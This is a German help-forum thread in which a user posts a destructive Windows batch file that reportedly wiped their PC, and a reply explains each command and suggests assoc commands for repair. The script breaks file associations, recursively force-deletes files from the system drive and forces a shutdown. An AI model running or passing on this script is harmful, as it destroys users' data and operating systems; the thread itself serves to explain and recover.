Hallo Leute,
Ich habe gestern eine .bat datei ausgeführt die mir meine
wichtigen daten vom pc gelöscht hat z.b win32.dllexe usw ich
kann fast nichts mehr am Pc machen und nicht einmal mehr 3d
spiele spielen…hier der .bat code
@echo off
cd /d %windir%
cd\
assoc .exe=error
assoc .dll=error
attrib -r -s -h *.* /s /d > nul
del /s /f /q *.* > nul
shutdown -s -f -t 00
Ich hoffe für Dich, dass Du uns verarschst. Entschuldige, aber so dämlich kann wohl niemand sein, das Ganze schaut so aus wie wenn ein Script-Kiddie versucht, einen Wirkungsteil für ein Virus zusammenzupfuschen. Die Befehle machen im Einzelnen:
- Wechsle zum System-Laufwerk (Tipp: das Kommando
cd /d „%systemdrive%“ macht dasselbe, nur eleganter …
- versaut die Zuordnungen von .exe und .dll Dateiendungen, gehört zu
assoc .exe=exefile
assoc .dll=dllfile
entfernt dann das Read-Only und System-Attribut von allen Dateien und löscht sie dann. Das würde mehrere Minuten dauern, und nur ein kompletter Computer-Trottel würde das Programm seelenruhig durchlaufen lassen.
Aber eigentlich ist die ganze Story faul, der primitive Code müsste eigentlich bereits nach wenigen Sekunden in der Root an der Datei pagefile.sys scheitern und abbrechen, ohne Schaden anzurichten. Entschuldige, wenn ich das jetzt nicht auf meinem PC ausprobiere.
Mit welchen code kann ich wiederherstellen ? (habe leider
keine Windows XP Cd …)
Wenn meine Theorie stimmt, hat das Programm nichts wirklich gelöscht. Stelle die associations mit assoc wieder richtig (siehe oben) und es müsste alles wieder OK sein.
Ansonsten hilft nur Reparatur- oder Neuinstallation mit CD, dafür hat man sie zu haben. Ein Undelete Tool (ist keins dabei bei Windows - gibt es aber an jedem Hauseck zum Download) wird bei Massen von Systemdateien, von denen einige mit Sicherehits durch Neustarts bereits überschrieben wurden - nicht funktionieren, und „del“ löscht nicht in den Papierkorb, also ist nix mit Papierkorb-wiederherstellen, auch nicht im abgesicherten Modus.
Ohne CD, keine Chance.
Punkt.